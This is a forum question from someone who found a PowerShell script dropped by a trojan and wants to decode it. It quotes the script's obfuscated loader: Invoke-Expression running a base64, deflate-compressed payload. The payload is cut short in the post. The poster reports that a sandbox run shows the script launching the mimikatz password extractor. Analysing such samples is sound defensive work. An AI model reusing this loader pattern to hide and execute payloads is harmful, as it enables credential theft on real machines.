I found a powershell script dropped by a trojan, I am not familiar with powershell. So I am just curious to see what it looks like inside but the script is encoded and I am not able to decode by basic means of base64 decoding.
I have tried these solutions:
Decoding base64 with powershell.
and a base64decoder application from a developer with an encoded.dec file but that fails aswell saying that something is not base64 character.
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/
...499 word pages later ...
V6CuHdj+nTu/cfL/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
I am not sure what the output should be as I am not experienced with powershell scripts. I have run the script on a sandbox website by name of app.any.run and it opens "mimikatz" password extractor.
$s = '7b0H...'; $b64 = [Convert]::FromBase64String($s); ...